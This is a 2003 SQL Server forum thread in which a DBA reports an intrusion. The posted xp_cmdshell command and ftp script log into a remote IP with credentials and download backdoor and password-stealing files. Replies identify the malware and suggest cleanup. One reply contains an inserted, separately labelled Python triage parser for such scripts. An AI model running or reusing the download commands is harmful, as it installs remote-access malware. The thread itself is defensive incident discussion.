SQL Server Performance

xp_cmdshell "ftp -s:c:\winnt\axis.cmd"

Discussion in 'General DBA Questions' started by Jon M, Nov 6, 2003.

  1. Jon M Member

    I saw this on one of my processes (spid 53), and no internal developer/user is running this command. Could this be a virus or hacker?

    Anyone seen this before?

    Thanks,
    Jon M
  2. Luis Martin Moderator

  3. Jon M Member

    I think somebody's trying to hack my machine.

    This is the detail of the axis.cmd:
    open 61.240.93.235 444
    max
    payne
    binary
    GET sud.ini
    GET TzoLibr.dll
    GET sud.exe
    BYE
    EXIT

    Any help would be greatly appreciated.

    Jon M
  4. Jon M Member

    I couldn't even delete the process nor delete the user login.

    Help!

    Jon M
  5. ChrisFretwell New Member

    I found some detail that may be of use when I went hunting the individual details in the axis.cmd that you listed.

    TzoLibr.dll is found in a few viruses/trojan horses and info gatherers.
    Sud.exe is listed as a backdoor thing-y (forgive my lack of technical usage; if it's not SQL related, I probably don't know the language). It is a password stealer, so it's quite important that you deal with it immediately.


    There is some more detailed info about sud.exe at http://www3.ca.com/virusinfo/virus.aspx?ID=9739
    This is the closest MS info on it: http://www.microsoft.com/technet/security/bulletin/ms00-057.asp

    What you have looks like a version of this, probably with some basic file names to make it less detectable. Check the virus sites and Microsoft for information on removing this. Start with a Google search on sud.exe and see where it leads you, then subsearch etc., until you find an exact enough listing. And look into a good virus blocking tool and make sure you get updates regularly for it.

    Good luck and keep us posted.
    Chris
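    The axis.cmd quoted above is an ftp.exe command script (the file passed with -s:). As an added triage helper that is not code from anyone in this thread, the following parses that script format and reports what a responder wants to know first: the remote host, a non-standard port, and every executable or library the script fetches. The sample script is constructed in the shape of the posted one, with the address replaced by one from the 192.0.2.0/24 documentation range.

```python
import re

EXEC_EXTS = (".exe", ".dll", ".com", ".scr", ".bat", ".cmd", ".vbs")  # flag if fetched

def parse_ftp_script(text):
    """Summarise an ftp -s: script: remote host and port, and the files it fetches."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    summary = {"host": None, "port": 21, "downloads": []}
    i = 0
    while i < len(lines):
        parts = lines[i].split()
        cmd = parts[0].lower()
        if cmd == "open" and len(parts) >= 2:
            summary["host"] = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                summary["port"] = int(parts[2])
            i += 3  # ftp.exe reads the next two lines as user name and password
            continue
        if cmd in ("get", "recv", "mget"):
            summary["downloads"].extend(parts[1:])
        i += 1
    if summary["host"] is None:
        raise ValueError("no 'open' command: not an ftp -s script")
    return summary

def triage(text):
    """Return the indicators a responder should look at for this script."""
    s = parse_ftp_script(text)
    findings = []
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", s["host"]):
        findings.append(f"connects to raw IP address {s['host']}")
    if s["port"] != 21:
        findings.append(f"uses non-standard FTP port {s['port']}")
    for name in s["downloads"]:
        if name.lower().endswith(EXEC_EXTS):
            findings.append(f"downloads executable content: {name}")
    return findings

# Constructed sample in the shape of the axis.cmd quoted in the thread; the
# address is from the 192.0.2.0/24 documentation range, not the one posted.
SAMPLE_SCRIPT = """open 192.0.2.10 444
max
payne
GET sud.ini
GET TzoLibr.dll
GET sud.exe
BYE
EXIT
"""
```

    Running triage(SAMPLE_SCRIPT) yields four findings: the raw IP, port 444, and the two executable downloads (sud.ini is not flagged).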
  6. FrankKalis Moderator

    Piggy-backing on Chris, I suggest you take a look at http://www.sqlsecurity.com .
    Very good information on how to secure your server.

    Hm... I think somewhere I have the source from Openhack 2002 on my computer. IIRC there was a description by Microsoft on the absolute minimum permission needed to run SQL Server. If wanted, just post and I'll dig.

    Frank
    http://www.insidesql.de
    http://www.familienzirkus.de


    Sorry, too dumb to hack in the correct link this morning.
  7. Jon M Member

    Thanks for all the info guys.

    Jon M
